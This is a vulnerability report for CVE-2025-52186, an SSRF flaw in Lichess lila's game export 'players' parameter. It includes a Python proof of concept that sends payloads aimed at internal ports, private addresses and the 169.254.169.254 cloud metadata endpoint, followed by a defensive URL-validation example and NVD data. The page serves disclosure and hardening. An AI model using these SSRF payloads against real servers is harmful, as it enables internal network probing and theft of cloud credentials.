Security Vulnerability Report
CVE-2025-52186 CVSS 6.5 MEDIUM

Published: 2025-11-13 16:15:51
Last Modified: 2026-01-09 15:52:03

Description

Lichess lila before commit 11b4c0fb00f0ffd823246f839627005459c8f05c (2025-06-02) contains a Server-Side Request Forgery (SSRF) vulnerability in the game export API. The players parameter is passed directly to an internal HTTP client without validation, allowing remote attackers to force the server to send HTTP requests to arbitrary URLs. In the Lichess API the players parameter is documented as the URL of a text file with player names and ratings to substitute into the exported PGN, which is why the server fetches a user-supplied URL at all; the flaw is that the URL was fetched without any restriction on scheme, host or port.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:lichess:lila:*:*:*:*:*:*:*:* - VULNERABLE
Lichess lila < commit 11b4c0fb00f0ffd823246f839627005459c8f05c (2025-06-02)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-52186 SSRF PoC
# Sends the game export endpoint a `players` value that is a URL to an
# internal host, so the vulnerable server fetches it on the attacker's behalf.
import requests

# Placeholder for the instance under test (authorized testing only).
target = "http://target-lichess-server/api/game/export/12345"

# Candidate SSRF destinations: internal services, closed and open ports,
# and the cloud instance metadata endpoint.
ssrf_payloads = [
    # Probe internal services
    "http://127.0.0.1:6379/",
    "http://192.168.1.1:8080/admin",
    "http://10.0.0.1:9200/_cat/indices",
    # Port scanning via SSRF
    "http://127.0.0.1:22/",
    "http://127.0.0.1:3306/",
    # Read internal metadata
    "http://169.254.169.254/latest/meta-data/",
]

for payload in ssrf_payloads:
    params = {"players": payload}
    try:
        # Differences in status code, body or latency between payloads
        # indicate whether the server reached the internal target.
        response = requests.get(target, params=params, timeout=10)
        print(f"Payload: {payload}")
        print(f"Status: {response.status_code}")
        print(f"Response: {response.text[:200]}")
        print("---")
    except requests.exceptions.RequestException as e:
        print(f"Error with {payload}: {e}")
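The check the vulnerable handler lacked, as an added example for the description and the PoC above: it is written for this page and is not code from lila (which is Scala). It is a URL policy for a server-side fetch of a user-supplied URL such as the players parameter, exercised offline against the PoC's payloads plus the encodings a filter on "127.0.0.1" alone would miss. The hostnames, the resolver answers in FAKE_DNS and the 80/443 port allowlist are constructed for the demonstration; the real resolver path uses socket.getaddrinfo.

```python
"""URL policy for fetching a user-supplied URL from the server side.

Hypothetical hardening example written for this page, not lila's code.
Parse the URL, restrict it to http(s) on standard ports, refuse userinfo,
then check every address the host resolves to against non-public ranges
before the server is allowed to connect.
"""
import ipaddress
import socket
from typing import Callable, Iterable, List, Union
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {80, 443}          # stops port scanning of 22/3306/6379 via SSRF

IPAddress = Union[ipaddress.IPv4Address, ipaddress.IPv6Address]
Resolver = Callable[[str], Iterable[str]]


def resolve_all(host: str) -> List[str]:
    """Real DNS: every A/AAAA record for host (used in production)."""
    infos = socket.getaddrinfo(host, None, type=socket.SOCK_STREAM)
    return sorted({info[4][0] for info in infos})


# Constructed resolver answers so the demo runs offline (not real DNS).
FAKE_DNS = {
    "example.com": ["93.184.216.34"],
    "2130706433": ["127.0.0.1"],          # decimal form of 127.0.0.1, as libc parses it
    "metadata.internal": ["169.254.169.254"],
    "rebind.attacker.test": ["93.184.216.34", "10.0.0.5"],  # mixed public/private records
}


def fake_resolver(host: str) -> List[str]:
    return FAKE_DNS.get(host.lower(), [])


def is_public_address(ip: IPAddress) -> bool:
    """True only for globally routable unicast addresses.

    is_global already excludes loopback, RFC 1918, link-local (so the
    169.254.169.254 metadata endpoint), CGNAT 100.64/10, ULA, TEST-NETs
    and the unspecified address. IPv4-mapped IPv6 (::ffff:127.0.0.1) is
    unwrapped and judged as the IPv4 address it carries.
    """
    mapped = getattr(ip, "ipv4_mapped", None)
    if mapped is not None:
        ip = mapped
    return ip.is_global and not ip.is_multicast


def validate_fetch_url(url: str, resolver: Resolver = resolve_all) -> List[str]:
    """Return the addresses a fetch of url may connect to, or raise ValueError.

    The caller should connect to one of the returned addresses (pin the IP)
    instead of letting the HTTP client resolve again, and must re-run this
    check on every redirect Location rather than following it blindly.
    """
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES:
        raise ValueError(f"scheme not allowed: {parts.scheme!r}")
    if parts.username is not None or parts.password is not None:
        raise ValueError("userinfo in URL not allowed")
    host = parts.hostname
    if not host:
        raise ValueError("missing host")
    port = parts.port if parts.port is not None else (443 if parts.scheme == "https" else 80)
    if port not in ALLOWED_PORTS:
        raise ValueError(f"port not allowed: {port}")
    # Dotted/colon literals are checked directly. Odd spellings (decimal,
    # octal, hex) are rejected by ipaddress and go to the resolver, which
    # returns their canonical form; an unresolvable host fails closed.
    try:
        addresses = [str(ipaddress.ip_address(host))]
    except ValueError:
        addresses = list(resolver(host))
    if not addresses:
        raise ValueError(f"host did not resolve: {host!r}")
    for addr in addresses:           # one non-public record is enough to refuse
        if not is_public_address(ipaddress.ip_address(addr)):
            raise ValueError(f"non-public address {addr} for host {host!r}")
    return addresses


def is_safe_fetch_url(url: str, resolver: Resolver = resolve_all) -> bool:
    """Boolean form of validate_fetch_url for callers that only need a verdict."""
    try:
        validate_fetch_url(url, resolver)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    candidates = [
        "http://example.com/players.txt",           # legitimate use of the parameter
        "http://127.0.0.1:6379/", "http://10.0.0.1:9200/_cat/indices",
        "http://169.254.169.254/latest/meta-data/", "http://2130706433/",
        "http://[::ffff:127.0.0.1]/", "http://rebind.attacker.test/",
        "gopher://127.0.0.1:6379/_PING", "http://user@example.com/",
    ]
    for c in candidates:
        try:
            print(f"ALLOW {c} -> {validate_fetch_url(c, fake_resolver)}")
        except ValueError as e:
            print(f"DENY  {c}: {e}")
```

Two caveats go with this check. Validating the URL string is not enough on its own: the connection must be made to the address the check approved, or a host whose DNS answer changes between check and connect (rebinding) reaches 127.0.0.1 anyway. And a public host that answers with a 302 to 169.254.169.254 defeats a check run only on the initial URL, so the HTTP client must have automatic redirects disabled or re-run the check on each Location.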

References

https://github.com/lichess-org/lila/commit/11b4c0fb00f0ffd8232346f839627005459c8f05c (NVD tag: Broken Link; the hash in this URL is 41 hex characters and does not match the 40-character fixing commit 11b4c0fb00f0ffd823246f839627005459c8f05c given in the description)
https://hackerone.com/reports/3165242 (NVD tags: Exploit, Issue Tracking)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-52186", "sourceIdentifier": "[email protected]", "published": "2025-11-13T16:15:51.433", "lastModified": "2026-01-09T15:52:03.223", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Lichess lila before commit 11b4c0fb00f0ffd823246f839627005459c8f05c (2025-06-02) contains a Server-Side Request Forgery (SSRF) vulnerability in the game export API. The players parameter is passed directly to an internal HTTP client without validation, allowing remote attackers to force the server to send HTTP requests to arbitrary URLs"}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:lichess:lila:*:*:*:*:*:*:*:*", "versionEndExcluding": "2025-06-02", "matchCriteriaId": "62D1947A-0E12-4043-A5BC-DD20C8C43E38"}]}]}], "references": [{"url": "https://github.com/lichess-org/lila/commit/11b4c0fb00f0ffd8232346f839627005459c8f05c", "source": "[email protected]", "tags": ["Broken Link"]}, {"url": "https://hackerone.com/reports/3165242", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking"]}]}}